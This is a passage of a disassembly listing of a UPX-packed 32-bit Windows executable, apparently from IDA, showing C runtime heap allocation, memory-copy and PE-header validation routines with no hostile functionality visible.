shr ebx, cl
lea esi, [esi+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [esi]
jnz short loc_408C6F
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_408C6F
; ---------------------------------------------------------------------------
loc_408C53: ; CODE XREF: sub_408A42+1F6�j
lea ecx, [esi-20h]
shr ebx, cl
lea ecx, [esi+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_408C6F
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_408C6F: ; CODE XREF: sub_408A42+208�j
; sub_408A42+20F�j ...
mov ebx, [ebp+arg_4]
loc_408C72: ; CODE XREF: sub_408A42+1EC�j
mov ecx, [edi+8]
mov esi, [edi+4]
mov [ecx+4], esi
mov esi, [edi+8]
mov ecx, [edi+4]
mov [ecx+8], esi
mov esi, [ebp+arg_8]
add esi, [ebp+var_4]
mov [ebp+arg_8], esi
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_408C99
push 3Fh
pop esi
loc_408C99: ; CODE XREF: sub_408A42+1D1�j
; sub_408A42+252�j
mov ecx, [ebp+var_C]
lea ecx, [ecx+esi*8]
mov edi, [ecx+4]
mov [ebx+8], ecx
mov [ebx+4], edi
mov [ecx+4], ebx
mov ecx, [ebx+4]
mov [ecx+8], ebx
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_408D10
mov cl, [esi+eax+4]
mov byte ptr [ebp+arg_4+3], cl
inc cl
cmp esi, 20h
mov [esi+eax+4], cl
jnb short loc_408CE7
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_408CDF
mov ecx, esi
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx], edi
loc_408CDF: ; CODE XREF: sub_408A42+28D�j
lea eax, [eax+edx*4+44h]
mov ecx, esi
jmp short loc_408D07
; ---------------------------------------------------------------------------
loc_408CE7: ; CODE XREF: sub_408A42+287�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_408CFD
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx+4], edi
loc_408CFD: ; CODE XREF: sub_408A42+2A9�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [esi-20h]
loc_408D07: ; CODE XREF: sub_408A42+2A3�j
mov edx, 80000000h
shr edx, cl
or [eax], edx
loc_408D10: ; CODE XREF: sub_408A42+275�j
mov eax, [ebp+arg_8]
mov [ebx], eax
mov [eax+ebx-4], eax
loc_408D19: ; CODE XREF: sub_408A42+196�j
; sub_408A42:loc_408BE4�j
xor eax, eax
inc eax
loc_408D1C: ; CODE XREF: sub_408A42+19D�j
pop edi
pop esi
pop ebx
leave
retn
sub_408A42 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408D21 proc near ; CODE XREF: sub_404DE2+28�p
; sub_40916E+88�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, ds:dword_4108CC
mov ecx, [ebp+arg_0]
imul eax, 14h
add eax, ds:dword_4108D0
add ecx, 17h
and ecx, 0FFFFFFF0h
mov [ebp+var_10], ecx
sar ecx, 4
push ebx
dec ecx
cmp ecx, 20h
push esi
push edi
jge short loc_408D58
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
jmp short loc_408D65
; ---------------------------------------------------------------------------
loc_408D58: ; CODE XREF: sub_408D21+2A�j
add ecx, 0FFFFFFE0h
or edx, 0FFFFFFFFh
xor esi, esi
shr edx, cl
mov [ebp+var_8], edx
loc_408D65: ; CODE XREF: sub_408D21+35�j
mov ecx, ds:dword_4108D8
mov ebx, ecx
jmp short loc_408D80
; ---------------------------------------------------------------------------
loc_408D6F: ; CODE XREF: sub_408D21+64�j
mov edx, [ebx+4]
mov edi, [ebx]
and edx, [ebp+var_8]
and edi, esi
or edx, edi
jnz short loc_408D87
add ebx, 14h
loc_408D80: ; CODE XREF: sub_408D21+4C�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jb short loc_408D6F
loc_408D87: ; CODE XREF: sub_408D21+5A�j
cmp ebx, eax
jnz short loc_408E0A
mov ebx, ds:dword_4108D0
jmp short loc_408DA4
; ---------------------------------------------------------------------------
loc_408D93: ; CODE XREF: sub_408D21+88�j
mov edx, [ebx+4]
mov edi, [ebx]
and edx, [ebp+var_8]
and edi, esi
or edx, edi
jnz short loc_408DAB
add ebx, 14h
loc_408DA4: ; CODE XREF: sub_408D21+70�j
cmp ebx, ecx
mov [ebp+arg_0], ebx
jb short loc_408D93
loc_408DAB: ; CODE XREF: sub_408D21+7E�j
cmp ebx, ecx
jnz short loc_408E0A
jmp short loc_408DBD
; ---------------------------------------------------------------------------
loc_408DB1: ; CODE XREF: sub_408D21+9E�j
cmp dword ptr [ebx+8], 0
jnz short loc_408DC1
add ebx, 14h
mov [ebp+arg_0], ebx
loc_408DBD: ; CODE XREF: sub_408D21+8E�j
cmp ebx, eax
jb short loc_408DB1
loc_408DC1: ; CODE XREF: sub_408D21+94�j
cmp ebx, eax
jnz short loc_408DF6
mov ebx, ds:dword_4108D0
jmp short loc_408DD6
; ---------------------------------------------------------------------------
loc_408DCD: ; CODE XREF: sub_408D21+BA�j
cmp dword ptr [ebx+8], 0
jnz short loc_408DDD
add ebx, 14h
loc_408DD6: ; CODE XREF: sub_408D21+AA�j
cmp ebx, ecx
mov [ebp+arg_0], ebx
jb short loc_408DCD
loc_408DDD: ; CODE XREF: sub_408D21+B0�j
cmp ebx, ecx
jnz short loc_408DF6
call sub_40888C
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jnz short loc_408DF6
loc_408DEF: ; CODE XREF: sub_408D21+E7�j
xor eax, eax
jmp loc_408FFF
; ---------------------------------------------------------------------------
loc_408DF6: ; CODE XREF: sub_408D21+A2�j
; sub_408D21+BE�j ...
push ebx
call sub_40893C
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_408DEF
loc_408E0A: ; CODE XREF: sub_408D21+68�j
; sub_408D21+8C�j
mov ds:dword_4108D8, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_408E31
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_408E5A
loc_408E31: ; CODE XREF: sub_408D21+FA�j
and [ebp+var_4], 0
mov edx, [eax+0C4h]
lea ecx, [eax+44h]
loc_408E3E: ; CODE XREF: sub_408D21+134�j
mov edi, [ecx]
and edx, [ebp+var_8]
and edi, esi
or edx, edi
jnz short loc_408E57
inc [ebp+var_4]
mov edx, [ecx+84h]
add ecx, 4
jmp short loc_408E3E
; ---------------------------------------------------------------------------
loc_408E57: ; CODE XREF: sub_408D21+126�j
mov edx, [ebp+var_4]
loc_408E5A: ; CODE XREF: sub_408D21+10E�j
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
xor edi, edi
and ecx, esi
jnz short loc_408E88
mov ecx, [eax+edx*4+0C4h]
and ecx, [ebp+var_8]
push 20h
pop edi
jmp short loc_408E88
; ---------------------------------------------------------------------------
loc_408E85: ; CODE XREF: sub_408D21+169�j
add ecx, ecx
inc edi
loc_408E88: ; CODE XREF: sub_408D21+153�j
; sub_408D21+162�j
test ecx, ecx
jge short loc_408E85
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
sar esi, 4
dec esi
cmp esi, 3Fh
mov [ebp+var_8], ecx
jle short loc_408EA9
push 3Fh
pop esi
loc_408EA9: ; CODE XREF: sub_408D21+183�j
cmp esi, edi
jz loc_408FB2
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_408F15
cmp edi, 20h
mov ebx, 80000000h
jge short loc_408EE9
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_408F12
mov ecx, [ebp+var_14]
mov ebx, [ebp+arg_0]
and [ebx], ecx
jmp short loc_408F15
; ---------------------------------------------------------------------------
loc_408EE9: ; CODE XREF: sub_408D21+1A0�j
lea ecx, [edi-20h]
shr ebx, cl
mov ecx, [ebp+var_4]
lea ecx, [eax+ecx*4+0C4h]
lea edi, [eax+edi+4]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_408F12
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_408F15
; ---------------------------------------------------------------------------
loc_408F12: ; CODE XREF: sub_408D21+1BC�j
; sub_408D21+1E4�j
mov ebx, [ebp+arg_0]
loc_408F15: ; CODE XREF: sub_408D21+196�j
; sub_408D21+1C6�j ...
cmp [ebp+var_8], 0
mov ecx, [edx+8]
mov edi, [edx+4]
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_408FBE
mov ecx, [ebp+var_C]
lea ecx, [ecx+esi*8]
mov edi, [ecx+4]
mov [edx+8], ecx
mov [edx+4], edi
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_408FAF
mov cl, [esi+eax+4]
mov byte ptr [ebp+arg_0+3], cl
inc cl
cmp esi, 20h
mov [esi+eax+4], cl
jge short loc_408F86
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_408F74
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_408F74: ; CODE XREF: sub_408D21+246�j
mov ecx, esi
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_408FAF
; ---------------------------------------------------------------------------
loc_408F86: ; CODE XREF: sub_408D21+240�j
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_408F99
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_408F99: ; CODE XREF: sub_408D21+269�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_408FAF: ; CODE XREF: sub_408D21+22E�j
; sub_408D21+263�j
mov ecx, [ebp+var_8]
loc_408FB2: ; CODE XREF: sub_408D21+18A�j
test ecx, ecx
jz short loc_408FC1
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_408FC1
; ---------------------------------------------------------------------------
loc_408FBE: ; CODE XREF: sub_408D21+20A�j
mov ecx, [ebp+var_8]
loc_408FC1: ; CODE XREF: sub_408D21+293�j
; sub_408D21+29B�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_408FF7
cmp ebx, ds:dword_410770
jnz short loc_408FF7
mov ecx, [ebp+var_4]
cmp ecx, ds:dword_4108E0
jnz short loc_408FF7
and ds:dword_410770, 0
loc_408FF7: ; CODE XREF: sub_408D21+2BA�j
; sub_408D21+2C2�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_408FFF: ; CODE XREF: sub_408D21+D0�j
pop edi
pop esi
pop ebx
leave
retn
sub_408D21 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409004 proc near ; CODE XREF: sub_40908B+4D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_4], edi
mov [ebp+var_8], esi
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov ecx, [ebp+arg_8]
shr ecx, 7
jmp short loc_409024
; ---------------------------------------------------------------------------
db 8Dh, 9Bh, 4 dup(0)
; ---------------------------------------------------------------------------
loc_409024: ; CODE XREF: sub_409004+18�j
; sub_409004+7B�j
movdqa xmm0, oword ptr [esi]
movdqa xmm1, oword ptr [esi+10h]
movdqa xmm2, oword ptr [esi+20h]
movdqa xmm3, oword ptr [esi+30h]
movdqa oword ptr [edi], xmm0
movdqa oword ptr [edi+10h], xmm1
movdqa oword ptr [edi+20h], xmm2
movdqa oword ptr [edi+30h], xmm3
movdqa xmm4, oword ptr [esi+40h]
movdqa xmm5, oword ptr [esi+50h]
movdqa xmm6, oword ptr [esi+60h]
movdqa xmm7, oword ptr [esi+70h]
movdqa oword ptr [edi+40h], xmm4
movdqa oword ptr [edi+50h], xmm5
movdqa oword ptr [edi+60h], xmm6
movdqa oword ptr [edi+70h], xmm7
lea esi, [esi+80h]
lea edi, [edi+80h]
dec ecx
jnz short loc_409024
mov esi, [ebp+var_8]
mov edi, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_409004 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40908B proc near ; CODE XREF: sub_405020+42�j
; sub_405A70+42�j ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
mov [ebp+var_C], edi
mov [ebp+var_8], esi
mov [ebp+var_4], ebx
mov ebx, [ebp+arg_4]
mov eax, ebx
cdq
mov ecx, eax
mov eax, [ebp+arg_0]
xor ecx, edx
sub ecx, edx
and ecx, 0Fh
xor ecx, edx
sub ecx, edx
cdq
mov edi, eax
xor edi, edx
sub edi, edx
and edi, 0Fh
xor edi, edx
sub edi, edx
mov edx, ecx
or edx, edi
jnz short loc_40910E
mov esi, [ebp+arg_8]
mov ecx, esi
and ecx, 7Fh
mov [ebp+var_18], ecx
cmp esi, ecx
jz short loc_4090E6
sub esi, ecx
push esi
push ebx
push eax
call sub_409004
add esp, 0Ch
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_18]
loc_4090E6: ; CODE XREF: sub_40908B+46�j
test ecx, ecx
jz short loc_409161
mov ebx, [ebp+arg_8]
mov edx, [ebp+arg_4]
add edx, ebx
sub edx, ecx
mov [ebp+var_14], edx
add ebx, eax
sub ebx, ecx
mov [ebp+var_10], ebx
mov esi, [ebp+var_14]
mov edi, [ebp+var_10]
mov ecx, [ebp+var_18]
rep movsb
mov eax, [ebp+arg_0]
jmp short loc_409161
; ---------------------------------------------------------------------------
loc_40910E: ; CODE XREF: sub_40908B+37�j
cmp ecx, edi
jnz short loc_409147
neg ecx
add ecx, 10h
mov [ebp+var_1C], ecx
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov ecx, [ebp+var_1C]
rep movsb
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_1C]
mov edx, [ebp+arg_4]
add edx, [ebp+var_1C]
mov eax, [ebp+arg_8]
sub eax, [ebp+var_1C]
push eax
push edx
push ecx
call sub_40908B
add esp, 0Ch
mov eax, [ebp+arg_0]
jmp short loc_409161
; ---------------------------------------------------------------------------
loc_409147: ; CODE XREF: sub_40908B+85�j
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov ecx, [ebp+arg_8]
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov eax, [ebp+arg_0]
loc_409161: ; CODE XREF: sub_40908B+5D�j
; sub_40908B+81�j ...
mov ebx, [ebp+var_4]
mov esi, [ebp+var_8]
mov edi, [ebp+var_C]
mov esp, ebp
pop ebp
retn
sub_40908B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40916E proc near ; CODE XREF: sub_405413+E�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 00409273 SIZE 00000019 BYTES
push 0Ch
push offset dword_40E1C8
call __SEH_prolog4
mov ecx, [ebp+arg_0]
xor edi, edi
cmp ecx, edi
jbe short loc_4091B1
push 0FFFFFFE0h
pop eax
xor edx, edx
div ecx
cmp eax, [ebp+arg_4]
sbb eax, eax
inc eax
jnz short loc_4091B1
call sub_4053C0
mov dword ptr [eax], 0Ch
push edi
push edi
push edi
push edi
push edi
call sub_402191
add esp, 14h
loc_4091AA: ; CODE XREF: sub_40916E+E6�j
; sub_40916E+F2�j
xor eax, eax
jmp loc_409286
; ---------------------------------------------------------------------------
loc_4091B1: ; CODE XREF: sub_40916E+13�j
; sub_40916E+22�j
imul ecx, [ebp+arg_4]
mov esi, ecx
mov [ebp+arg_0], esi
cmp esi, edi
jnz short loc_4091C1
xor esi, esi
inc esi
loc_4091C1: ; CODE XREF: sub_40916E+4E�j
; sub_40916E+DB�j
xor ebx, ebx
mov [ebp+var_1C], ebx
cmp esi, 0FFFFFFE0h
ja short loc_409234
cmp ds:dword_4108E4, 3
jnz short loc_40921F
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
mov eax, [ebp+arg_0]
cmp eax, ds:dword_4108D4
ja short loc_40921F
push 4
call sub_4079D2
pop ecx
mov [ebp+ms_exc.disabled], edi
push [ebp+arg_0]
call sub_408D21
pop ecx
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40926A
mov ebx, [ebp+var_1C]
cmp ebx, edi
jz short loc_409223
push [ebp+arg_0]
push edi
push ebx
call sub_4021D0
add esp, 0Ch
loc_40921F: ; CODE XREF: sub_40916E+64�j
; sub_40916E+78�j
cmp ebx, edi
jnz short loc_409284
loc_409223: ; CODE XREF: sub_40916E+A2�j
push esi
push 8
push ds:dword_4105D4
call dword_40C050 ; RtlAllocateHeap
mov ebx, eax
loc_409234: ; CODE XREF: sub_40916E+5B�j
cmp ebx, edi
jnz short loc_409284
cmp ds:dword_410774, edi
jz short loc_409273
push esi
call sub_404EFE
pop ecx
test eax, eax
jnz loc_4091C1
mov eax, [ebp+arg_8]
cmp eax, edi
jz loc_4091AA
mov dword ptr [eax], 0Ch
jmp loc_4091AA
sub_40916E endp
; =============== S U B R O U T I N E =======================================
sub_409265 proc near ; DATA XREF: UPX1:0040E1E0�o
xor edi, edi
mov esi, [ebp+0Ch]
sub_409265 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40926A proc near ; CODE XREF: sub_40916E+98�p
push 4
call sub_4078FA
pop ecx
retn
sub_40926A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40916E
loc_409273: ; CODE XREF: sub_40916E+D0�j
cmp ebx, edi
jnz short loc_409284
mov eax, [ebp+arg_8]
cmp eax, edi
jz short loc_409284
mov dword ptr [eax], 0Ch
loc_409284: ; CODE XREF: sub_40916E+B3�j
; sub_40916E+C8�j ...
mov eax, ebx
loc_409286: ; CODE XREF: sub_40916E+3E�j
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_40916E
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40928C proc near ; CODE XREF: sub_40545B+C�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 004093D9 SIZE 000000CE BYTES
push 10h
push offset dword_40E1E8
call __SEH_prolog4
mov ebx, [ebp+arg_0]
test ebx, ebx
jnz short loc_4092AD
push [ebp+arg_4]
call sub_404E31
pop ecx
jmp loc_409479
; ---------------------------------------------------------------------------
loc_4092AD: ; CODE XREF: sub_40928C+11�j
mov esi, [ebp+arg_4]
test esi, esi
jnz short loc_4092C0
push ebx
call sub_404F20
pop ecx
jmp loc_409477
; ---------------------------------------------------------------------------
loc_4092C0: ; CODE XREF: sub_40928C+26�j
cmp ds:dword_4108E4, 3
jnz loc_409460
loc_4092CD: ; CODE XREF: sub_40928C+169�j
xor edi, edi
mov [ebp+var_1C], edi
cmp esi, 0FFFFFFE0h
ja loc_409465
push 4
call sub_4079D2
pop ecx
mov [ebp+ms_exc.disabled], edi
push ebx
call sub_40854D
pop ecx
mov [ebp+var_20], eax
cmp eax, edi
jz loc_409396
cmp esi, ds:dword_4108D4
ja short loc_409349
push esi
push ebx
push eax
call sub_408A42
add esp, 0Ch
test eax, eax
jz short loc_409314
mov [ebp+var_1C], ebx
jmp short loc_409349
; ---------------------------------------------------------------------------
loc_409314: ; CODE XREF: sub_40928C+81�j
push esi
call sub_408D21
pop ecx
mov [ebp+var_1C], eax
cmp eax, edi
jz short loc_409349
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_40932C
mov eax, esi
loc_40932C: ; CODE XREF: sub_40928C+9C�j
push eax
push ebx
push [ebp+var_1C]
call sub_405020
push ebx
call sub_40854D
mov [ebp+var_20], eax
push ebx
push eax
call sub_408578
add esp, 18h
loc_409349: ; CODE XREF: sub_40928C+72�j
; sub_40928C+86�j ...
cmp [ebp+var_1C], edi
jnz short loc_409396
cmp esi, edi
jnz short loc_409358
xor esi, esi
inc esi
mov [ebp+arg_4], esi
loc_409358: ; CODE XREF: sub_40928C+C4�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
push esi
push edi
push ds:dword_4105D4
call dword_40C050 ; RtlAllocateHeap
mov [ebp+var_1C], eax
cmp eax, edi
jz short loc_409396
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_409380
mov eax, esi
loc_409380: ; CODE XREF: sub_40928C+F0�j
push eax
push ebx
push [ebp+var_1C]
call sub_405020
push ebx
push [ebp+var_20]
call sub_408578
add esp, 14h
loc_409396: ; CODE XREF: sub_40928C+66�j
; sub_40928C+C0�j ...
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4093D0
cmp [ebp+var_20], 0
jnz short loc_4093D9
test esi, esi
jnz short loc_4093AD
inc esi
loc_4093AD: ; CODE XREF: sub_40928C+11E�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
push esi
push ebx
push 0
push ds:dword_4105D4
call dword_40C0F8 ; RtlReAllocateHeap
mov edi, eax
jmp short loc_4093DC
sub_40928C endp
; =============== S U B R O U T I N E =======================================
sub_4093CA proc near ; DATA XREF: UPX1:0040E200�o
mov esi, [ebp+0Ch]
mov ebx, [ebp+8]
sub_4093CA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4093D0 proc near ; CODE XREF: sub_40928C+111�p
push 4
call sub_4078FA
pop ecx
retn
sub_4093D0 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40928C
loc_4093D9: ; CODE XREF: sub_40928C+11A�j
mov edi, [ebp+var_1C]
loc_4093DC: ; CODE XREF: sub_40928C+13C�j
test edi, edi
jnz loc_4094A3
cmp ds:dword_410774, edi
jz short loc_409418
push esi
call sub_404EFE
pop ecx
test eax, eax
jnz loc_4092CD
call sub_4053C0
cmp [ebp+var_20], edi
jnz short loc_409471
loc_409405: ; CODE XREF: sub_40928C+1F8�j
mov esi, eax
call dword_40C088 ; RtlGetLastWin32Error
push eax
call sub_405385
pop ecx
mov [esi], eax
jmp short loc_409477
; ---------------------------------------------------------------------------
loc_409418: ; CODE XREF: sub_40928C+15E�j
test edi, edi
jnz loc_4094A3
call sub_4053C0
cmp [ebp+var_20], edi
jz short loc_409492
mov dword ptr [eax], 0Ch
jmp short loc_4094A3
; ---------------------------------------------------------------------------
loc_409432: ; CODE XREF: sub_40928C+1D7�j
test esi, esi
jnz short loc_409437
inc esi
loc_409437: ; CODE XREF: sub_40928C+1A8�j
push esi
push ebx
push 0
push ds:dword_4105D4
call dword_40C0F8 ; RtlReAllocateHeap
mov edi, eax
test edi, edi
jnz short loc_4094A3
cmp ds:dword_410774, eax
jz short loc_409489
push esi
call sub_404EFE
pop ecx
test eax, eax
jz short loc_40947F
loc_409460: ; CODE XREF: sub_40928C+3B�j
cmp esi, 0FFFFFFE0h
jbe short loc_409432
loc_409465: ; CODE XREF: sub_40928C+49�j
push esi
call sub_404EFE
pop ecx
call sub_4053C0
loc_409471: ; CODE XREF: sub_40928C+177�j
mov dword ptr [eax], 0Ch
loc_409477: ; CODE XREF: sub_40928C+2F�j
; sub_40928C+18A�j
xor eax, eax
loc_409479: ; CODE XREF: sub_40928C+1C�j
; sub_40928C+219�j
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_40947F: ; CODE XREF: sub_40928C+1D2�j
call sub_4053C0
jmp loc_409405
; ---------------------------------------------------------------------------
loc_409489: ; CODE XREF: sub_40928C+1C7�j
test edi, edi
jnz short loc_4094A3
call sub_4053C0
loc_409492: ; CODE XREF: sub_40928C+19C�j
mov esi, eax
call dword_40C088 ; RtlGetLastWin32Error
push eax
call sub_405385
mov [esi], eax
pop ecx
loc_4094A3: ; CODE XREF: sub_40928C+152�j
; sub_40928C+18E�j ...
mov eax, edi
jmp short loc_409479
; END OF FUNCTION CHUNK FOR sub_40928C
; =============== S U B R O U T I N E =======================================
sub_4094A7 proc near ; CODE XREF: sub_405665:loc_405688�p
push esi
push edi
xor edi, edi
loc_4094AB: ; CODE XREF: sub_4094A7+1A�j
lea esi, off_40FAD8[edi]
push dword ptr [esi]
call sub_404694
add edi, 4
cmp edi, 28h
pop ecx
mov [esi], eax
jb short loc_4094AB
pop edi
pop esi
retn
sub_4094A7 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4094D0 proc near ; CODE XREF: sub_409550+3F�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
cmp word ptr [ecx], 5A4Dh
jz short loc_4094DE
loc_4094DB: ; CODE XREF: sub_4094D0+19�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4094DE: ; CODE XREF: sub_4094D0+9�j
mov eax, [ecx+3Ch]
add eax, ecx
cmp dword ptr [eax], 4550h
jnz short loc_4094DB
xor ecx, ecx
cmp word ptr [eax+18h], 10Bh
setz cl
mov eax, ecx
retn
sub_4094D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409500 proc near ; CODE XREF: sub_409550+59�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov ecx, [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
push ebx
push esi
movzx esi, word ptr [ecx+6]
xor edx, edx
test esi, esi
push edi
lea eax, [eax+ecx+18h]
jbe short loc_40953C
mov edi, [esp+0Ch+arg_4]
loc_409522: ; CODE XREF: sub_409500+3A�j
mov ecx, [eax+0Ch]
cmp edi, ecx
jb short loc_409532
mov ebx, [eax+8]
add ebx, ecx
cmp edi, ebx
jb short loc_40953E
loc_409532: ; CODE XREF: sub_409500+27�j
add edx, 1
add eax, 28h
cmp edx, esi
jb short loc_409522
loc_40953C: ; CODE XREF: sub_409500+1C�j
xor eax, eax
loc_40953E: ; CODE XREF: sub_409500+30�j
pop edi
pop esi
pop ebx
retn
sub_409500 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409550 proc near ; CODE XREF: sub_405665+E�p
; sub_405665+79�p ...
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFEh
push offset dword_40E208
push offset sub_4058D0
mov eax, large fs:0
push eax
sub esp, 8
push ebx
push esi
push edi
mov eax, ds:dword_40F060
xor [ebp+var_8], eax
xor eax, ebp
push eax
lea eax, [ebp+var_10]
mov large fs:0, eax
mov [ebp+var_18], esp
mov [ebp+var_4], 0
push 400000h
call sub_4094D0
add esp, 4
test eax, eax
jz short loc_4095F0
mov eax, [ebp+arg_0]
sub eax, 400000h
push eax
push 400000h
call sub_409500
add esp, 8
test eax, eax
jz short loc_4095F0
mov eax, [eax+24h]
shr eax, 1Fh
not eax
and eax, 1
mov [ebp+var_4], 0FFFFFFFEh
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
mov eax, [ebp+var_14]
mov ecx, [eax]
mov eax, [ecx]
xor edx, edx
cmp eax, 0C0000005h
setz dl
mov eax, edx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
loc_4095F0: ; CODE XREF: sub_409550+49�j
; sub_409550+63�j
mov [ebp+var_4], 0FFFFFFFEh
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_409550 endp
; =============== S U B R O U T I N E =======================================
sub_40960B proc near ; CODE XREF: sub_405819+27�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_410778, eax
mov ds:dword_41077C, eax
mov ds:dword_410780, eax
mov ds:dword_410784, eax
retn
